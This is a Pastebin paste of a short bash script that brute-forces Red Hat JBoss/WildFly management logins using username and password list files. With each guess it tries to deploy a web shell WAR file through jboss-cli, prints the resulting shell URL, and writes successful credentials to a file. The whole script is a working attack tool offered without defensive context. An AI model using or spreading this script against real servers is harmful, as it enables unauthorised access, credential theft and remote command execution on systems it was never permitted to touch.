Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Sun Feb 18 14:17:10 CET 2018
- JBOSSBIN="."
- WAR="/opt/war/shell.war"
- HOST=$1
- passlist="passwordlist.txt"
- userlist="userlist.txt"
- saveas="SUCCESS_eap.txt"
- function exploit {
- echo -e "
- This module attempts to login to redhat wildfly,
- jboss instance using username and password combinations
- "
- while IFS='' read -r usr || [[ -n "$usr" ]]; do
- while IFS='' read -r passwd || [[ -n "$passwd" ]]; do
- if [[ $($JBOSSBIN/jboss-cli.sh -c controller=$HOST:9990 --user=$usr --password=$passwd --command="deploy $WAR" | awk {'print $1'} | awk NR==1) == "Failed" ]]
- then
- echo "[-] Fail login with user: $usr AND password: $passwd"
- else
- echo "[+] Correct credentials ..."
- echo -e " | Success login with user: $usr AND password: $passwd"
- echo -e " | Shell available on: http://$HOST:8080/shell"
- echo -e " | Management Interface available on: http://$HOST:9990"
- echo -e " |_ Write credential to : $saveas"
- echo -e "$HOST:9990 - $usr:$passwd" >> $saveas
- exit
- fi
- done < "$passlist"
- done < "$userlist"
- }
- exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement